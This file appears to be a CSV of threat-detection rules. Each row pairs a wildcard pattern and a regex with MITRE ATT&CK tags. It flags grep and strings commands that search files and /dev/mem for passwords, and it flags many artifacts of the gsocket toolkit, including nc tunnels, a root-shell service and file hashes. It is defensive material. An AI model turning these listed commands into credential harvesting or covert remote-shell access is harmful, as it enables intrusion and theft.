"*grep -roiE *password*",".{0,1000}grep\s\-roiE\s.{0,1000}password.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*grep*|pwd=|passwd=|password=*",".{0,1000}grep.{0,1000}\|pwd\=\|passwd\=\|password\=.{0,1000}","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*grep*password|pwd|pass*",".{0,1000}grep.{0,1000}password\|pwd\|pass.{0,1000}","greyware_tool_keyword","grep","search for passwords","T1213 - T1081","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*strings -n * /dev/mem | grep -i pass*",".{0,1000}strings\s\-n\s.{0,1000}\s\/dev\/mem\s\|\sgrep\s\-i\spass.{0,1000}","greyware_tool_keyword","grep","search for passwords in memory and core dumps","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"* GS_STTY_INIT_HACK*",".{0,1000}\sGS_STTY_INIT_HACK.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"* gsocket-*.tar.gz*",".{0,1000}\sgsocket\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"* gsocket_*_all.deb*",".{0,1000}\sgsocket_.{0,1000}_all\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"* nc *.gsocket*",".{0,1000}\snc\s.{0,1000}\.gsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"* nc gsocket 31337*",".{0,1000}\snc\sgsocket\s31337.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"* --remote gsocket*",".{0,1000}\s\-\-remote\sgsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"* --rm -it --name gsocket*",".{0,1000}\s\-\-rm\s\-it\s\-\-name\sgsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"* ssh *@gsocket*",".{0,1000}\sssh\s.{0,1000}\@gsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"* start gs-sshd*",".{0,1000}\sstart\sgs\-sshd.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"* status gs-sshd*",".{0,1000}\sstatus\sgs\-sshd.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/bin/gs-netcat*",".{0,1000}\/bin\/gs\-netcat.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/etc/gsocket.conf*",".{0,1000}\/etc\/gsocket\.conf.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket-*.tar.gz*",".{0,1000}\/gsocket\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket.git*",".{0,1000}\/gsocket\.git.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket/releases/latest*",".{0,1000}\/gsocket\/releases\/latest.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_*_all.deb*",".{0,1000}\/gsocket_.{0,1000}_all\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_*_x86_64.deb*",".{0,1000}\/gsocket_.{0,1000}_x86_64\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_*aarch64.deb*",".{0,1000}\/gsocket_.{0,1000}aarch64\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_*arm.deb*",".{0,1000}\/gsocket_.{0,1000}arm\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_*armv6.deb*",".{0,1000}\/gsocket_.{0,1000}armv6\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_*armv7l.deb*",".{0,1000}\/gsocket_.{0,1000}armv7l\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_*i686.deb*",".{0,1000}\/gsocket_.{0,1000}i686\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_*mips32.deb*",".{0,1000}\/gsocket_.{0,1000}mips32\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_*mips64.deb*",".{0,1000}\/gsocket_.{0,1000}mips64\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_*mipsel.deb*",".{0,1000}\/gsocket_.{0,1000}mipsel\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_dso.so.*",".{0,1000}\/gsocket_dso\.so\..{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket_latest_all.deb*",".{0,1000}\/gsocket_latest_all\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket-build*",".{0,1000}\/gsocket\-build.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket-deb*",".{0,1000}\/gsocket\-deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket-pkg/*",".{0,1000}\/gsocket\-pkg\/.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket-src*",".{0,1000}\/gsocket\-src.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gsocket-tor*",".{0,1000}\/gsocket\-tor.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gs-portforward.service*",".{0,1000}\/gs\-portforward\.service.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/gs-root-shell.service*",".{0,1000}\/gs\-root\-shell\.service.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/lib/gsocket_*.so*",".{0,1000}\/lib\/gsocket_.{0,1000}\.so.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/raw/main/gsocket/*",".{0,1000}\/raw\/main\/gsocket\/.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/root/.gs_with_tor*",".{0,1000}\/root\/\.gs_with_tor.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/share/gsocket/*",".{0,1000}\/share\/gsocket\/.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/tools/gs-pipe *",".{0,1000}\/tools\/gs\-pipe\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/usr/bin/gs-mount*",".{0,1000}\/usr\/bin\/gs\-mount.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/usr/bin/gs-netcat*",".{0,1000}\/usr\/bin\/gs\-netcat.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/usr/bin/gsocket*",".{0,1000}\/usr\/bin\/gsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*/usr/bin/gs-sftp*",".{0,1000}\/usr\/bin\/gs\-sftp.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*\gsocket-*.tar.gz*",".{0,1000}\\gsocket\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*\gsocket_*_all.deb*",".{0,1000}\\gsocket_.{0,1000}_all\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*\gsocket_dso.so.*",".{0,1000}\\gsocket_dso\.so\..{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*] GS login detected. Total Users: *",".{0,1000}\]\sGS\slogin\sdetected\.\sTotal\sUsers\:\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*] GS logout detected. Remaining Users: *",".{0,1000}\]\sGS\slogout\sdetected\.\sRemaining\sUsers\:\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*00b5a02c0350f67ee2562d63461f29a2907e3e991b51a0fa3e424b102b1cf552*",".{0,1000}00b5a02c0350f67ee2562d63461f29a2907e3e991b51a0fa3e424b102b1cf552.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*05fb17382f049ded33be4d8d624a2b3cc246ab0814e44f07352c12e1880079b6*",".{0,1000}05fb17382f049ded33be4d8d624a2b3cc246ab0814e44f07352c12e1880079b6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*06541ed5fb95052dfeda2cc6165732d1c125f9b49ed400f578750b03a67c418f*",".{0,1000}06541ed5fb95052dfeda2cc6165732d1c125f9b49ed400f578750b03a67c418f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*0a5e1abf70407a1de22cd14107dca8019bab45e8bfe4c45ca1e05e7e8bb92e89*",".{0,1000}0a5e1abf70407a1de22cd14107dca8019bab45e8bfe4c45ca1e05e7e8bb92e89.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*0ca53778e8cf399b1052ba2f500881d04066525b65e8b564360e7b581ac9cf68*",".{0,1000}0ca53778e8cf399b1052ba2f500881d04066525b65e8b564360e7b581ac9cf68.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*0cf7ec1618e87248f23674db07692a63fbd4e945102b143baa5b34d7eebb5977*",".{0,1000}0cf7ec1618e87248f23674db07692a63fbd4e945102b143baa5b34d7eebb5977.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*0da3621a6676dcb4ac7e260ea7280a14d05c9bcc02c0a296a6507172a3cc7bd8*",".{0,1000}0da3621a6676dcb4ac7e260ea7280a14d05c9bcc02c0a296a6507172a3cc7bd8.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*0dd41d5c99202fa4387bb5b9db7ce55236fc913b65e3a9fb58f697d3480f14ef*",".{0,1000}0dd41d5c99202fa4387bb5b9db7ce55236fc913b65e3a9fb58f697d3480f14ef.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*0e95446bac57b2a3276703c700865bf025f1eac27bc5c9ebcf820c1e351b6732*",".{0,1000}0e95446bac57b2a3276703c700865bf025f1eac27bc5c9ebcf820c1e351b6732.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*0f948584d230abb0e870a4e46541cdf4dd8b60f23fa7e031d27cd856bc49b4c4*",".{0,1000}0f948584d230abb0e870a4e46541cdf4dd8b60f23fa7e031d27cd856bc49b4c4.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*1106565073956253736/mEDRS5iY0S4sgUnRh8Q5pC4S54zYwczZhGOwXvR3vKr7YQmA0Ej1-Ig60Rh4P_TGFq-m*",".{0,1000}1106565073956253736\/mEDRS5iY0S4sgUnRh8Q5pC4S54zYwczZhGOwXvR3vKr7YQmA0Ej1\-Ig60Rh4P_TGFq\-m.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*1160bcaa562e5a40c74e633ec58a2518b110e74b1d3f48bfa06f74f72cf9ff98*",".{0,1000}1160bcaa562e5a40c74e633ec58a2518b110e74b1d3f48bfa06f74f72cf9ff98.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*11f50c95d4dbcd97d5c76753aa7bc38bb615295f553a4c989015176ac0fa3be3*",".{0,1000}11f50c95d4dbcd97d5c76753aa7bc38bb615295f553a4c989015176ac0fa3be3.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*155c711cf850d024e86f65be8ff0f9e7e0e947c5632350913dadf8cc678909fa*",".{0,1000}155c711cf850d024e86f65be8ff0f9e7e0e947c5632350913dadf8cc678909fa.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*17eb30ef4d91991b265d5d93ab7f4ad6b58d43061a46ba3292142b962be95f7d*",".{0,1000}17eb30ef4d91991b265d5d93ab7f4ad6b58d43061a46ba3292142b962be95f7d.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*1a1be3746ab4055e51557ec20f236da58a4dcbe1a523c8f5a2cd5dc97e699533*",".{0,1000}1a1be3746ab4055e51557ec20f236da58a4dcbe1a523c8f5a2cd5dc97e699533.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*1ab1fb9214bf799302b9204b211eec714d0c1fd551ca45adeab8483a350719a3*",".{0,1000}1ab1fb9214bf799302b9204b211eec714d0c1fd551ca45adeab8483a350719a3.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
